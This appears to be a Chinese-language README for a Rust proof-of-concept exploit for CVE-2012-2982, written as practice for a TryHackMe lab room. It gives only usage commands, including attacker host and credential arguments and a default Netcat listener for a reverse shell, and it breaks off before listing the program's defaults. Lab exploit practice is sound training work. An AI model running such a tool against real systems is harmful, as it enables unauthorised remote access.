此 PoC 漏洞利用代码针对 CVE-2012-2982,是为 TryHackMe 上的“PoC 脚本入门”房间编写的练习脚本。
该房间的地址为:https://tryhackme.com/room/intropocscripting
我原本打算用 Python 来完成,但最终决定借此机会练习 Rust 技能。
我还注意到 GitHub 上几乎所有非 Metasploit 的实现都是用 Python 写的, 所以我觉得带来一些新东西也许会很有趣。
注意: 默认情况下,程序会启动一个 Netcat 监听器。
如果 Netcat 不在你的路径中,或者你想运行自己的监听器,请使用 -d 参数运行程序。
从源代码运行(需要 Rust 和 Cargo):
# 查看参数的详细信息:
cargo run -- --help
# 常规命令结构:
cargo run -- <rhost> <lhost> <username> <password> [选项]
从二进制文件运行:
# 查看参数的详细信息:
./cve-2012-2982 --help
# 常规命令结构:
./cve-2012-2982 <rhost> <lhost> <username> <password> [选项]
程序默认值: